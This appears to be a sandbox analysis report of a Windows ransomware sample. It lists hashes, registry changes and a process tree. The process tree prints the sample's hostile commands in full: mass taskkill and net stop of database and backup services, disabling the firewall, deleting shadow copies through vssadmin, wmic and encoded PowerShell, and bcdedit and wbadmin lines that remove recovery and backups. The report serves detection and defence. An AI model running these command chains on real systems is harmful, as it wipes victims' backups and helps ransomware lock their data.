Analysis
-
max time kernel
33s -
max time network
66s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
27-07-2021 17:10
Static task
static1
Behavioral task
behavioral1
Sample
1069-cc87764d70827118862689d1630efc72547f97aa.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
1069-cc87764d70827118862689d1630efc72547f97aa.exe
Resource
win10v20210410
General
-
Target
1069-cc87764d70827118862689d1630efc72547f97aa.exe
-
Size
3.2MB
-
MD5
f17e50158a1faf71deb3a6e8b4f3271f
-
SHA1
cc87764d70827118862689d1630efc72547f97aa
-
SHA256
99a0753cba25425651e42ff7673506aa4090a03d8398f702e41d80ca5c2b212e
-
SHA512
e60404ec7d526dd522ca6347c1fbc87f9783b0c0fa31ca4b8aaa656718a8ceaaf26ec8259a31df58ddb0500df8b7a0f63ad7aca652860d50baf4bc66fdd7643b
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process File created C:\Windows\System32\drivers\etc\host 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\@Adsız@.jpg" 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Drops file in Windows directory 1 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process File created C:\Windows\Please Read ME!!!.log 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1248 vssadmin.exe 268 vssadmin.exe 556 vssadmin.exe 952 vssadmin.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2444 taskkill.exe 2512 taskkill.exe 2308 taskkill.exe 2480 taskkill.exe 2184 taskkill.exe 2272 taskkill.exe 2152 taskkill.exe 2340 taskkill.exe 2372 taskkill.exe 2040 taskkill.exe 2120 taskkill.exe 2544 taskkill.exe 2220 taskkill.exe 2412 taskkill.exe -
Modifies Control Panel 2 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\desktop 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\TileWallpaper = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1844 powershell.exe 1844 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exevssvc.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2040 taskkill.exe Token: SeBackupPrivilege 1600 vssvc.exe Token: SeRestorePrivilege 1600 vssvc.exe Token: SeAuditPrivilege 1600 vssvc.exe Token: SeIncreaseQuotaPrivilege 1732 WMIC.exe Token: SeSecurityPrivilege 1732 WMIC.exe Token: SeTakeOwnershipPrivilege 1732 WMIC.exe Token: SeLoadDriverPrivilege 1732 WMIC.exe Token: SeSystemProfilePrivilege 1732 WMIC.exe Token: SeSystemtimePrivilege 1732 WMIC.exe Token: SeProfSingleProcessPrivilege 1732 WMIC.exe Token: SeIncBasePriorityPrivilege 1732 WMIC.exe Token: SeCreatePagefilePrivilege 1732 WMIC.exe Token: SeBackupPrivilege 1732 WMIC.exe Token: SeRestorePrivilege 1732 WMIC.exe Token: SeShutdownPrivilege 1732 WMIC.exe Token: SeDebugPrivilege 1732 WMIC.exe Token: SeSystemEnvironmentPrivilege 1732 WMIC.exe Token: SeRemoteShutdownPrivilege 1732 WMIC.exe Token: SeUndockPrivilege 1732 WMIC.exe Token: SeManageVolumePrivilege 1732 WMIC.exe Token: 33 1732 WMIC.exe Token: 34 1732 WMIC.exe Token: 35 1732 WMIC.exe Token: SeIncreaseQuotaPrivilege 1352 WMIC.exe Token: SeSecurityPrivilege 1352 WMIC.exe Token: SeTakeOwnershipPrivilege 1352 WMIC.exe Token: SeLoadDriverPrivilege 1352 WMIC.exe Token: SeSystemProfilePrivilege 1352 WMIC.exe Token: SeSystemtimePrivilege 1352 WMIC.exe Token: SeProfSingleProcessPrivilege 1352 WMIC.exe Token: SeIncBasePriorityPrivilege 1352 WMIC.exe Token: SeCreatePagefilePrivilege 1352 WMIC.exe Token: SeBackupPrivilege 1352 WMIC.exe Token: SeRestorePrivilege 1352 WMIC.exe Token: SeShutdownPrivilege 1352 WMIC.exe Token: SeDebugPrivilege 1352 WMIC.exe Token: SeSystemEnvironmentPrivilege 1352 WMIC.exe Token: SeRemoteShutdownPrivilege 1352 WMIC.exe Token: SeUndockPrivilege 1352 WMIC.exe Token: SeManageVolumePrivilege 1352 WMIC.exe Token: 33 1352 WMIC.exe Token: 34 1352 WMIC.exe Token: 35 1352 WMIC.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeIncreaseQuotaPrivilege 1352 WMIC.exe Token: SeSecurityPrivilege 1352 WMIC.exe Token: SeTakeOwnershipPrivilege 1352 WMIC.exe Token: SeLoadDriverPrivilege 1352 WMIC.exe Token: SeSystemProfilePrivilege 1352 WMIC.exe Token: SeSystemtimePrivilege 1352 WMIC.exe Token: SeProfSingleProcessPrivilege 1352 WMIC.exe Token: SeIncBasePriorityPrivilege 1352 WMIC.exe Token: SeCreatePagefilePrivilege 1352 WMIC.exe Token: SeBackupPrivilege 1352 WMIC.exe Token: SeRestorePrivilege 1352 WMIC.exe Token: SeShutdownPrivilege 1352 WMIC.exe Token: SeDebugPrivilege 1352 WMIC.exe Token: SeSystemEnvironmentPrivilege 1352 WMIC.exe Token: SeRemoteShutdownPrivilege 1352 WMIC.exe Token: SeUndockPrivilege 1352 WMIC.exe Token: SeManageVolumePrivilege 1352 WMIC.exe Token: 33 1352 WMIC.exe Token: 34 1352 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
NOTEPAD.EXEpid process 1696 NOTEPAD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.execmd.execmd.execmd.execmd.execmd.exenet.execmd.execmd.exedescription pid process target process PID 1100 wrote to memory of 1976 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1976 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1976 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1976 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1788 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1788 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1788 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1788 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1760 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1760 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1760 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1760 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1776 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1776 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1776 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1776 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 2028 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 2028 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 2028 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 2028 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1976 wrote to memory of 2040 1976 cmd.exe taskkill.exe PID 1976 wrote to memory of 2040 1976 cmd.exe taskkill.exe PID 1976 wrote to memory of 2040 1976 cmd.exe taskkill.exe PID 1976 wrote to memory of 2040 1976 cmd.exe taskkill.exe PID 1788 wrote to memory of 2024 1788 cmd.exe net.exe PID 1788 wrote to memory of 2024 1788 cmd.exe net.exe PID 1788 wrote to memory of 2024 1788 cmd.exe net.exe PID 1788 wrote to memory of 2024 1788 cmd.exe net.exe PID 1760 wrote to memory of 1280 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1280 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1280 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1280 1760 cmd.exe netsh.exe PID 1100 wrote to memory of 1192 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1192 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1192 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1192 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1776 wrote to memory of 1248 1776 cmd.exe vssadmin.exe PID 1776 wrote to memory of 1248 1776 cmd.exe vssadmin.exe PID 1776 wrote to memory of 1248 1776 cmd.exe vssadmin.exe PID 1776 wrote to memory of 1248 1776 cmd.exe vssadmin.exe PID 1100 wrote to memory of 1492 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1492 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1492 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 1100 wrote to memory of 1492 1100 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2028 wrote to memory of 268 2028 cmd.exe vssadmin.exe PID 2028 wrote to memory of 268 2028 cmd.exe vssadmin.exe PID 2028 wrote to memory of 268 2028 cmd.exe vssadmin.exe PID 2028 wrote to memory of 268 2028 cmd.exe vssadmin.exe PID 2024 wrote to memory of 1028 2024 net.exe net1.exe PID 2024 wrote to memory of 1028 2024 net.exe net1.exe PID 2024 wrote to memory of 1028 2024 net.exe net1.exe PID 2024 wrote to memory of 1028 2024 net.exe net1.exe PID 1492 wrote to memory of 556 1492 cmd.exe vssadmin.exe PID 1492 wrote to memory of 556 1492 cmd.exe vssadmin.exe PID 1492 wrote to memory of 556 1492 cmd.exe vssadmin.exe PID 1492 wrote to memory of 556 1492 cmd.exe vssadmin.exe PID 1192 wrote to memory of 1844 1192 cmd.exe powershell.exe PID 1192 wrote to memory of 1844 1192 cmd.exe powershell.exe PID 1192 wrote to memory of 1844 1192 cmd.exe powershell.exe PID 1192 wrote to memory of 1844 1192 cmd.exe powershell.exe PID 1788 wrote to memory of 1576 1788 cmd.exe net.exe PID 1788 wrote to memory of 1576 1788 cmd.exe net.exe PID 1788 wrote to memory of 1576 1788 cmd.exe net.exe PID 1788 wrote to memory of 1576 1788 cmd.exe net.exe -
System policy modification 1 TTPs 17 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"1⤵
- Drops file in Drivers directory
- Checks whether UAC is enabled
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Please Read ME!!!.log1⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\Please Read ME!!!.logMD5
81051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
memory/240-83-0x0000000000000000-mapping.dmp
-
memory/268-73-0x0000000000000000-mapping.dmp
-
memory/432-85-0x0000000000000000-mapping.dmp
-
memory/548-82-0x0000000000000000-mapping.dmp
-
memory/556-109-0x0000000000000000-mapping.dmp
-
memory/556-75-0x0000000000000000-mapping.dmp
-
memory/664-95-0x0000000000000000-mapping.dmp
-
memory/692-84-0x0000000000000000-mapping.dmp
-
memory/760-111-0x0000000000000000-mapping.dmp
-
memory/800-97-0x0000000000000000-mapping.dmp
-
memory/836-101-0x0000000000000000-mapping.dmp
-
memory/836-80-0x0000000000000000-mapping.dmp
-
memory/848-110-0x0000000000000000-mapping.dmp
-
memory/880-98-0x0000000000000000-mapping.dmp
-
memory/908-88-0x0000000000000000-mapping.dmp
-
memory/912-103-0x0000000000000000-mapping.dmp
-
memory/928-100-0x0000000000000000-mapping.dmp
-
memory/940-102-0x0000000000000000-mapping.dmp
-
memory/952-92-0x0000000000000000-mapping.dmp
-
memory/1028-74-0x0000000000000000-mapping.dmp
-
memory/1100-60-0x0000000075AF1000-0x0000000075AF3000-memory.dmpFilesize
8KB
-
memory/1100-68-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/1192-70-0x0000000000000000-mapping.dmp
-
memory/1248-71-0x0000000000000000-mapping.dmp
-
memory/1252-81-0x0000000000000000-mapping.dmp
-
memory/1280-69-0x0000000000000000-mapping.dmp
-
memory/1352-94-0x0000000000000000-mapping.dmp
-
memory/1380-91-0x0000000000000000-mapping.dmp
-
memory/1456-79-0x0000000000000000-mapping.dmp
-
memory/1492-72-0x0000000000000000-mapping.dmp
-
memory/1524-86-0x0000000000000000-mapping.dmp
-
memory/1536-87-0x0000000000000000-mapping.dmp
-
memory/1576-99-0x0000000000000000-mapping.dmp
-
memory/1576-78-0x0000000000000000-mapping.dmp
-
memory/1696-93-0x0000000000000000-mapping.dmp
-
memory/1696-123-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmpFilesize
8KB
-
memory/1732-96-0x0000000000000000-mapping.dmp
-
memory/1760-63-0x0000000000000000-mapping.dmp
-
memory/1768-89-0x0000000000000000-mapping.dmp
-
memory/1776-64-0x0000000000000000-mapping.dmp
-
memory/1784-112-0x0000000000000000-mapping.dmp
-
memory/1788-62-0x0000000000000000-mapping.dmp
-
memory/1844-124-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1844-76-0x0000000000000000-mapping.dmp
-
memory/1844-136-0x0000000006250000-0x0000000006251000-memory.dmpFilesize
4KB
-
memory/1844-114-0x0000000002050000-0x0000000002051000-memory.dmpFilesize
4KB
-
memory/1844-121-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/1844-118-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/1844-117-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/1844-128-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1844-113-0x0000000004890000-0x0000000004891000-memory.dmpFilesize
4KB
-
memory/1844-129-0x0000000006100000-0x0000000006101000-memory.dmpFilesize
4KB
-
memory/1844-115-0x00000000048D0000-0x00000000048D1000-memory.dmpFilesize
4KB
-
memory/1844-116-0x0000000004892000-0x0000000004893000-memory.dmpFilesize
4KB
-
memory/1848-90-0x0000000000000000-mapping.dmp
-
memory/1856-106-0x0000000000000000-mapping.dmp
-
memory/1924-108-0x0000000000000000-mapping.dmp
-
memory/1936-107-0x0000000000000000-mapping.dmp
-
memory/1944-105-0x0000000000000000-mapping.dmp
-
memory/1976-61-0x0000000000000000-mapping.dmp
-
memory/2024-67-0x0000000000000000-mapping.dmp
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2040-66-0x0000000000000000-mapping.dmp
-
memory/2120-138-0x0000000000000000-mapping.dmp
-
memory/2152-139-0x0000000000000000-mapping.dmp
-
memory/2184-140-0x0000000000000000-mapping.dmp
-
memory/2220-141-0x0000000000000000-mapping.dmp
-
memory/2272-142-0x0000000000000000-mapping.dmp
-
memory/2308-143-0x0000000000000000-mapping.dmp
-
memory/2340-144-0x0000000000000000-mapping.dmp
-
memory/2372-145-0x0000000000000000-mapping.dmp
-
memory/2412-146-0x0000000000000000-mapping.dmp
-
memory/2444-147-0x0000000000000000-mapping.dmp
-
